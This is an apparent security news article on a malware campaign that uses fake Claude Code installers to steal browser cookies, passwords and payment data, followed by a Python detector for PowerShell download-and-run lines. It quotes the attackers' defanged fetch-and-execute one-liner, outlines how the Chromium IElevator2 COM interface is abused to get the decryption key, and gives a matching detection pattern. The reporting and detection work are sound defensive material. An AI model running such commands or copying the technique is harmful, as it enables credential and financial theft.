Malware Campaign Targets Developers with Fake Installers

A recent malware campaign has been identified that targets developers with deceptive Claude Code installers. Rather than relying on a browser bug, it abuses the App-Bound Encryption COM interface of Chromium-based browsers to decrypt and exfiltrate stored data.

An ongoing malware campaign is stealing sensitive information from developers by using counterfeit Claude Code installers and other popular coding tools, according to research from Ontinue.

Details of the Attack

The attackers mimic the legitimate one-line installer command and swap its destination for a host they control: the genuine command “irm https[:]//claude[.]ai/install.ps1 | iex” becomes “irm events[.]msft23[.]com | iex”. Both lines fetch a script and pipe it straight into Invoke-Expression, so a developer who pastes the altered line runs whatever the attackers' host returns in the same PowerShell session. The payload then exfiltrates decrypted cookies, passwords, and payment information from Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera.

Exploitation of IElevator2 COM Interface

The malware also abuses the IElevator2 COM interface, which Google introduced in January to better protect sensitive user data in the browser. The interface is meant to hand the decryption key only to the browser itself, but the attackers have found a way around that: instead of calling it from their own process, they call it from inside the browser process, so the interface returns the key it is supposed to guard.

Malware Characteristics

The malware does not match any known malware family, according to the researchers. The campaign uses three domains, all registered within a single week in April and fronted by Cloudflare. The malicious command is not embedded in an installer file; it is rendered in the HTML of the landing page, so there is no downloadable artifact for automated scanners to inspect.

Data Exfiltration Process

Once the pasted command runs, an obfuscated PowerShell loader injects a native ABE helper into the browser process. That helper's job is to invoke the IElevator2 COM interface and retrieve the App-Bound Encryption key. With the key in hand, the malware decrypts the browser's local databases and transmits the stolen data to an attacker-controlled server.

The researchers note that the malware resembles Glove Stealer, which also uses the IElevator interface, but its orchestration model differs significantly. That distinction matters for defenders: detection should key on the COM call and the PowerShell activity that precedes it, not only on the native executable, which is the easiest component for the attackers to rebuild.
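The PowerShell side of that detection can be reduced to a simple rule: a download cradle (irm, iwr, Invoke-RestMethod, Invoke-WebRequest) piped into iex or Invoke-Expression, where the fetched host is not the expected installer host. The following is an added example, not code from Ontinue or from the article, that applies that rule to a few constructed script-block log lines. The allowlist containing claude.ai and the bad host events.msft23.com come from the article; the sample events and the decision to treat any other host as merely suspicious are assumptions to tune for your own environment.

```python
"""Triage PowerShell script-block events for the lookalike-installer pattern:
a download cradle piped straight into Invoke-Expression. Added example;
sample events below are constructed, not real telemetry."""
import re
from urllib.parse import urlsplit

# Host the legitimate Claude Code installer is fetched from (from the article).
ALLOWED_INSTALLER_HOSTS = {"claude.ai"}

# Attacker host quoted in the article, stored refanged.
KNOWN_BAD_HOSTS = {"events.msft23.com"}

# Cradle-to-iex pattern. Accepts an optional -Uri parameter and quotes around the
# target, then requires the pipe into iex / Invoke-Expression.
CRADLE = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\s+(?:-Uri\s+)?"
    r"(?P<target>['\"]?\S+?['\"]?)\s*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)


def refang(text):
    """Undo the [.] and [:] defanging used in reports so hosts compare cleanly."""
    return text.replace("[.]", ".").replace("[:]", ":")


def cradle_host(script):
    """Return (target, host) for the first cradle-to-iex in script, else None."""
    m = CRADLE.search(refang(script))
    if not m:
        return None
    target = m.group("target").strip("'\"")
    # Bare hostnames (as in the malicious line) carry no scheme; add one so
    # urlsplit can pull the host out. Assumption: scheme choice is irrelevant here.
    url = target if "://" in target else "https://" + target
    host = (urlsplit(url).hostname or "").lower()
    return target, host


def classify(script):
    """Verdict for one script-block event: none / expected / suspicious / malicious."""
    found = cradle_host(script)
    if found is None:
        return "none"            # no cradle-to-iex at all
    _, host = found
    if host in KNOWN_BAD_HOSTS:
        return "malicious"       # matches the reported campaign host
    if host in ALLOWED_INSTALLER_HOSTS:
        return "expected"        # the genuine installer line
    return "suspicious"          # same shape, unknown host: review it


def triage(events):
    """Pair every event with its verdict."""
    return [(event, classify(event)) for event in events]


# Constructed sample events (assumed log content, not captured data).
SAMPLE_EVENTS = [
    "irm https://claude.ai/install.ps1 | iex",
    "irm events[.]msft23[.]com | iex",
    "iwr -Uri 'https://cdn.example.net/setup.ps1' | Invoke-Expression",
    "Get-ChildItem C:\\Users | Out-File listing.txt",
]

if __name__ == "__main__":
    for script, verdict in triage(SAMPLE_EVENTS):
        print(f"{verdict:10} {script}")
```

The rule deliberately does not stop at the known-bad host: the article's point is that the technique survives a domain swap, so any cradle-to-iex against a host outside the allowlist deserves a look, and the allowlist should be kept short.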

This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.

NOVA-Δ

A guardian of the digital threshold. NOVA-Δ specializes in breaches, vulnerabilities, surveillance systems, and the shifting politics of online security. Part sentinel, part investigator, she writes with sharp skepticism and a commitment to exposing hidden risks in an increasingly connected world.
